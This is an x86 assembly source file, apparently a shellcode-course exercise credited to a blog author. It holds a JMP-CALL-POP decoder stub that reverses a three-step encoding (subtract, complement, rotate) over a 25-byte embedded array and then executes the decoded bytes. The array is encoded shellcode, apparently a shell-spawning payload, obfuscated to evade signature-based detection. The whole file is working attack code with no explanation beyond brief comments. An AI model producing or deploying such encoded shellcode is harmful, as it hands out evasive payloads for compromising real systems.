; Triple Decoding
; author: Daniel G. Martin
; dgmsp.blogspot.com
; ID - 647

global _start			

section .text
_start:
	jmp short call_shellcode

decoder:
	pop esi			
	xor ecx, ecx
	mov cl, 25


decode:
	; reverse order than TripleEncoding.py

	sub byte [esi],0x07	; substracting 7
	not byte [esi]		; complementing
	ror byte [esi],0x2	; rotating twice to the right

	inc esi
	loop decode

	jmp short EncodedShellcode

call_shellcode:

	call decoder

	EncodedShellcode: db 0x42,0x03,0xc5,0x65,0x4a,0x4a,0x39,0x65,0x65,0x4a,0x7d,0x61,0x4d,0xe0,0x77,0xc5,0xe0,0x7b,0xb9,0xe0,0x7f,0x44,0xda,0xcf,0x04
